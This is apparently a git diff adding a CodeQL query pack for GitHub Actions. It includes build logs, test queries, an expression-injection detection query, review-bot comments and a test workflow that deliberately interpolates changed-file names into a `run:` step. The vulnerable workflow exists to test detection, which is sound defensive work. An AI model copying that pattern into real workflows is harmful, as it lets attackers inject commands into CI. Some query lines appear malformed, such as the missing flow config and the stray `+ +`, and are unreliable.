"This option is only intended for use in debugging the extractor. 
Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-02-03 10:17:54] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test +[2024-02-03 10:17:54] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. +[2024-02-03 10:17:54] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-02-03 10:17:54] [PROGRESS] database init> Calculated baseline information for languages: (53ms). +[2024-02-03 10:17:54] [PROGRESS] database init> Resolving extractor yaml. +[2024-02-03 10:17:54] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:54] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:54] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. This in-progress database is ready to be populated by an extractor. +[2024-02-03 10:17:54] Plumbing command codeql database init completed. 
+[2024-02-03 10:17:54] [PROGRESS] database create> Running build command: [] +[2024-02-03 10:17:54] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:54] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. +[2024-02-03 10:17:54] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] +[2024-02-03 10:17:55] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] +[2024-02-03 10:17:55] Plumbing command codeql database trace-command completed. +[2024-02-03 10:17:55] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:55] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:55] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db... 
+[2024-02-03 10:17:55] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml +[2024-02-03 10:17:55] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache/version does not exist +[2024-02-03 10:17:55] Tuple pool not found. Clearing relations with cached strings +[2024-02-03 10:17:55] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode clear. +[2024-02-03 10:17:55] Sequence stamp origin is -6222583512417648685 +[2024-02-03 10:17:55] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Trimming completed (7ms): Purged everything. +[2024-02-03 10:17:55] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml +[2024-02-03 10:17:55] Found 2 TRAP files (2.87 KiB) +[2024-02-03 10:17:55] [PROGRESS] dataset import> Importing TRAP files +[2024-02-03 10:17:55] Importing test.yml.trap.gz (1 of 2) +[2024-02-03 10:17:55] Importing sourceLocationPrefix.trap.gz (2 of 2) +[2024-02-03 10:17:55] [PROGRESS] dataset import> Merging relations +[2024-02-03 10:17:55] Merging 1 fragment for 'files'. +[2024-02-03 10:17:55] Merged 8 bytes for 'files'. +[2024-02-03 10:17:55] Merging 1 fragment for 'folders'. +[2024-02-03 10:17:55] Merged 80 bytes for 'folders'. 
+[2024-02-03 10:17:55] Merging 1 fragment for 'containerparent'. +[2024-02-03 10:17:55] Merged 80 bytes for 'containerparent'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_scalars'. +[2024-02-03 10:17:55] Merged 552 bytes for 'yaml_scalars'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml'. +[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'yaml'. +[2024-02-03 10:17:55] Merging 1 fragment for 'locations_default'. +[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'locations_default'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_locations'. +[2024-02-03 10:17:55] Merged 472 bytes for 'yaml_locations'. +[2024-02-03 10:17:55] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-02-03 10:17:55] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-02-03 10:17:55] Saving string and id pools to disk. +[2024-02-03 10:17:55] Finished importing TRAP files. +[2024-02-03 10:17:55] Read 13.45 KiB of uncompressed TRAP data. +[2024-02-03 10:17:55] Relation data size: 3.93 KiB (merge rate: 52.86 KiB/s) +[2024-02-03 10:17:55] String pool size: 2.05 MiB +[2024-02-03 10:17:55] ID pool size: 1.03 MiB +[2024-02-03 10:17:55] [PROGRESS] dataset import> Finished writing database (relations: 3.93 KiB; string pool: 2.05 MiB). +[2024-02-03 10:17:55] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-02-03 10:17:55] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Plumbing command codeql dataset import completed. +[2024-02-03 10:17:55] [PROGRESS] database finalize> TRAP import complete (447ms). +[2024-02-03 10:17:55] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-02-03 10:17:56] [PROGRESS] database cleanup> TRAP files cleaned up (4ms). 
+[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-02-03 10:17:56] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). +[2024-02-03 10:17:56] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml. +[2024-02-03 10:17:56] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode trim. +[2024-02-03 10:17:56] Sequence stamp origin is -6222583510647662597 +[2024-02-03 10:17:56] Pausing evaluation to zealously trim disk at sequence stamp o+0 +[2024-02-03 10:17:56] Unpausing evaluation +[2024-02-03 10:17:56] Trimming completed (3ms): Trimmed disposable data from cache. +[2024-02-03 10:17:56] Pausing evaluation to close the cache at sequence stamp o+1 +[2024-02-03 10:17:56] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:56] Unpausing evaluation +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml +[2024-02-03 10:17:56] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml (5ms). +[2024-02-03 10:17:56] Plumbing command codeql dataset cleanup completed. +[2024-02-03 10:17:56] Plumbing command codeql database cleanup completed with status 0. +[2024-02-03 10:17:56] [PROGRESS] database finalize> Finished zipping source archive (578.00 B). +[2024-02-03 10:17:56] Plumbing command codeql database finalize completed. 
+[2024-02-03 10:17:56] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:56] Terminating normally. diff --git a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log new file mode 100644 index 00000000000..858ec59a13d --- /dev/null +++ b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log 
@@ -0,0 +1,15 @@ +[2024-02-03 10:17:55] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:55] Log file was started late. +[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:55] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --format=json +[2024-02-03 10:17:55] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test/test.yml" + ] +[2024-02-03 10:17:55] [DETAILS] database index-files> Found 1 files. +[2024-02-03 10:17:55] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:55] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] +[2024-02-03 10:17:55] Terminating normally. 
diff --git a/ql/lib/test-db/src.zip b/ql/lib/test-db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..3dbf073c49924685cbbad30b59944af574c77ae9 GIT binary patch literal 578 zcmWIWW@Zs#;Nak3unBUGU_b)iKz3+xYEiL%L3v(DYH>+wk$!P%a!z8BenC-wR%&ud zv3_E5NoIatv3_!XN@`(_E{t24qo0$Rqz}>rCiE(Eb6SH=7admM+4Ebw}@-&*HCX*mO-(<>9jurcV|DmT#ZViIkhd$??4S(D4@jEe#GH zLQ}rY-Mre`mRS<8;aoAyhp>O}l|q-Aya^WjAv z%^yDeS19qFwD3&e-ivQz|0Q-uY`&Q}r|!?E8*|RR+su$Qv0+zf@ZJtR^@49DGYywj zum^ava}-DO?zLiMVA#RLz!2cg$Rxsmh%{t5P^6&(Dn?;|H!B;+a7G}k1k#&<4q{*c E0HyckLI3~& literal 0 HcmV?d00001 diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql new file mode 100644 index 00000000000..2e358f3c30b --- /dev/null +++ b/ql/lib/test/test.ql 
@@ -0,0 +1,59 @@
+import codeql.actions.ast.internal.Actions
+import codeql.actions.Ast
+import codeql.actions.Cfg as Cfg
+import codeql.actions.DataFlow
+import codeql.Locations
+
+query predicate files(File f) { any() }
+
+query predicate yamlNodes(YamlNode n) { any() }
+
+query predicate jobNodes(JobStmt s) { any() }
+
+query predicate stepNodes(StepStmt s) { any() }
+
+query predicate usesNodes(UsesExpr s) { any() }
+
+query predicate usesSteps(UsesExpr call, string argname, Expression arg) {
+ call.getArgument(argname) = arg
+}
+
+query predicate runSteps1(RunExpr run, string body) { run.getScript() = body }
+
+query predicate runSteps2(RunExpr run, Expression bodyExpr) { run.getScriptExpr() = bodyExpr }
+
+query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNode() = run }
+
+query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() }
+
+query predicate outputAccesses(StepOutputAccessExpr va, string id, string var) {
+ id = va.getStepId() and var = va.getVarName()
+}
+
+query predicate orphanVarAccesses(ExprAccessExpr va, string var) {
+ var = va.getExpression() and
+ not exists(AstNode n | n = va.getParentNode())
+}
+
+query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode parent) {
+ var = va.getExpression() and
+ parent = va.getParentNode()
+}
+
+query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent }
+
+query predicate cfgNodes(Cfg::Node n) { any() }
+
+query predicate dfNodes(DataFlow::Node e) { any() }
+
+query predicate exprNodes(DataFlow::ExprNode e) { any() }
+
+query predicate argumentNodes(DataFlow::ArgumentNode e) { any() }
+
+query predicate localFlow(UsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() }
+
+query predicate usesIds(UsesExpr s, string a) { s.getId() = a }
+
+query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a }
+
+query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l }
diff --git a/ql/lib/test/test.yml b/ql/lib/test/test.yml
new file mode 100644
index 00000000000..2760a6c3d35
--- /dev/null
+++ b/ql/lib/test/test.yml
@@ -0,0 +1,36 @@
+on: push
+
+jobs:
+ job1:
+ runs-on: ubuntu-latest
+
+ outputs:
+ job_output: ${{ steps.step.outputs.value }}
+
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ fetch-depth: 0
+
+ - name: Get changed files
+ id: source
+ uses: tj-actions/changed-files@v40
+
+ - name: Remove foo from changed files
+ id: step
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ steps.source.outputs.all_changed_files }}
+ find: 'foo'
+ replace: ''
+
+ job2:
+ runs-on: ubuntu-latest
+
+ if: ${{ always() }}
+
+ needs: job1
+
+ steps:
+ - id: sink
+ run: echo ${{needs.job1.outputs.job_output}}
diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme
new file mode 100644
index 00000000000..20d83c71ee6
--- /dev/null
+++ b/ql/lib/yaml.dbscheme
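Review bot: `localFlow` in test.ql pairs a `UsesExpr` with a `StepOutputAccessExpr` only on equal step ids, so despite its name it checks no data flow. Step ids are unique only within a job, so once the fixture has more than one job or file it would also pair a step with output accesses that belong to a different job. I would rename it (for example `stepIdMatches`) or document the limit with a QLDoc line such as `/** Holds if o reads an output of a step whose id equals the id of s; matched by id only, not scoped to a job. */`.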
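Review bot: The test.yml fixture carries no comment saying which flow it is meant to exercise, so a later edit to a step id or output name can break the chain without anyone noticing. From the visible lines the intended chain is `steps.source.outputs.all_changed_files` into `with.source` of step `step`, then `steps.step.outputs.value` into `job_output`, then `needs.job1.outputs.job_output` interpolated into the `run:` of job2. A header comment such as `# Fixture: changed-files output reaches job2's run: step via job1.outputs.job_output; not a workflow to execute` would record that, and would also make clear that the tag-pinned third-party actions are test data rather than a pattern to copy.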
@@ -0,0 +1,80 @@
+/*- YAML -*/
+
+#keyset[parent, idx]
+yaml (unique int id: @yaml_node,
+ int kind: int ref,
+ int parent: @yaml_node_parent ref,
+ int idx: int ref,
+ string tag: string ref,
+ string tostring: string ref);
+
+case @yaml_node.kind of
+ 0 = @yaml_scalar_node
+| 1 = @yaml_mapping_node
+| 2 = @yaml_sequence_node
+| 3 = @yaml_alias_node
+;
+
+@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node;
+
+@yaml_node_parent = @yaml_collection_node | @file;
+
+yaml_anchors (unique int node: @yaml_node ref,
+ string anchor: string ref);
+
+yaml_aliases (unique int alias: @yaml_alias_node ref,
+ string target: string ref);
+
+yaml_scalars (unique int scalar: @yaml_scalar_node ref,
+ int style: int ref,
+ string value: string ref);
+
+yaml_errors (unique int id: @yaml_error,
+ string message: string ref);
+
+yaml_locations(unique int locatable: @yaml_locatable ref,
+ int location: @location_default ref);
+
+@yaml_locatable = @yaml_node | @yaml_error;
+
+/*- Files and folders -*/
+
+/**
+ * The location of an element.
+ * The location spans column `startcolumn` of line `startline` to
+ * column `endcolumn` of line `endline` in file `file`.
+ * For more information, see
+ * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/).
+ */
+locations_default(
+ unique int id: @location_default,
+ int file: @file ref,
+ int beginLine: int ref,
+ int beginColumn: int ref,
+ int endLine: int ref,
+ int endColumn: int ref
+);
+
+files(
+ unique int id: @file,
+ string name: string ref
+);
+
+folders(
+ unique int id: @folder,
+ string name: string ref
+);
+
+@container = @file | @folder
+
+containerparent(
+ int parent: @container ref,
+ unique int child: @container ref
+);
+
+/*- Source location prefix -*/
+
+/**
+ * The source location of the snapshot.
+ */
+sourceLocationPrefix(string prefix : string ref);
diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats
new file mode 100644
index 00000000000..1c35ae98402
--- /dev/null
+++ b/ql/lib/yaml.dbscheme.stats
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql
new file mode 100644
index 00000000000..f8d6e0c804b
--- /dev/null
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql
@@ -0,0 +1,37 @@
+/**
+ * @name Expression injection in Actions
+ * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious
+ * user to inject code into the GitHub action.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 9.3
+ * @precision high
+ * @id actions/command-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+
+private class ExpressionInjectionSink extends DataFlow::Node {
+ ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where MyFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + + " }}, which may be controlled by an external user."
diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml
new file mode 100644
index 00000000000..56f10b81e0c
--- /dev/null
+++ b/ql/src/codeql-pack.lock.yml
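Review bot: The inline cast `.(ExprAccessExpr)` in the `select` message of ExpressionInjection.ql also acts as a filter, so a path whose sink expression is not an `ExprAccessExpr` produces no row and the finding is dropped silently. `ExpressionInjectionSink` accepts whatever `getScriptExpr()` returns, which test.ql types as `Expression`, so whether other subclasses can reach the sink is not visible from this hunk. If they can, state the restriction in the sink's characteristic predicate or build the message from something defined on every sink. Separately, `@id actions/command-injection` does not match the query name and file, so I would use `@id actions/expression-injection`. The `@description` also calls `run:` and `script:` contexts, although they are the places where a context value is interpolated.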
@@ -0,0 +1,16 @@
+---
+lockVersion: 1.0.0
+dependencies:
+ codeql/controlflow:
+ version: 0.1.7
+ codeql/dataflow:
+ version: 0.1.7
+ codeql/ssa:
+ version: 0.2.7
+ codeql/typetracking:
+ version: 0.2.7
+ codeql/util:
+ version: 0.2.7
+ codeql/yaml:
+ version: 0.2.7
+compiled: false
diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls
new file mode 100644
index 00000000000..e69de29bb2d
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
new file mode 100644
index 00000000000..f4c43168664
--- /dev/null
+++ b/ql/src/qlpack.yml
@@ -0,0 +1,14 @@
+---
+library: false
+name: codeql/actions-queries
+version: 0.0.1
+groups:
+ - actions
+ - queries
+suites: codeql-suites
+extractor: yaml
+defaultSuiteFile: codeql-suites/actions-code-scanning.qls
+dependencies:
+ codeql/actions-all: ${workspace}
+warnOnImplicitThis: true
+tests: test
diff --git a/ql/src/test-db/baseline-info.json b/ql/src/test-db/baseline-info.json
new file mode 100644
index 00000000000..9e26dfeeb6e
--- /dev/null
+++ b/ql/src/test-db/baseline-info.json
@@ -0,0 +1 @@
+{}
\ No newline at end of file
diff --git a/ql/src/test-db/codeql-database.yml b/ql/src/test-db/codeql-database.yml
new file mode 100644
index 00000000000..1dedebb70be
--- /dev/null
+++ b/ql/src/test-db/codeql-database.yml
@@ -0,0 +1,10 @@
+---
+sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test
+baselineLinesOfCode: 0
+unicodeNewlines: false
+columnKind: utf16
+primaryLanguage: yaml
+creationMetadata:
+ cliVersion: 2.16.1
+ creationTime: 2024-02-03T09:17:52.592220Z
+finalised: true
diff --git a/ql/src/test-db/db-yaml/default/cache/.lock b/ql/src/test-db/db-yaml/default/cache/.lock
new file mode 100644
index 00000000000..e69de29bb2d
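Review bot: `defaultSuiteFile` in ql/src/qlpack.yml points at `codeql-suites/actions-code-scanning.qls`, which this commit adds with no content (its diff header is followed by no hunk). Running the pack through its default suite would therefore presumably select no queries, and the new ExpressionInjection query would not run. Either give the suite at least a `- queries: .` instruction in the same commit, or leave `defaultSuiteFile` out until the suite has content.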
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..0111728636533e2c31d7b0489e64f46bcd4d6cf2 GIT binary patch literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info new file mode 100644 index 0000000000000000000000000000000000000000..9c1ea6cdeb296b714876d0e928d9978e9ec788c9 GIT binary patch literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) literal 0 HcmV?d00001 
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..9cdb710dfd9490f67f5103cbab69eb12829f96b4 GIT binary patch literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..7bccaeb20c898fd660036bab54ae98c20280d0a3 GIT binary patch literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 
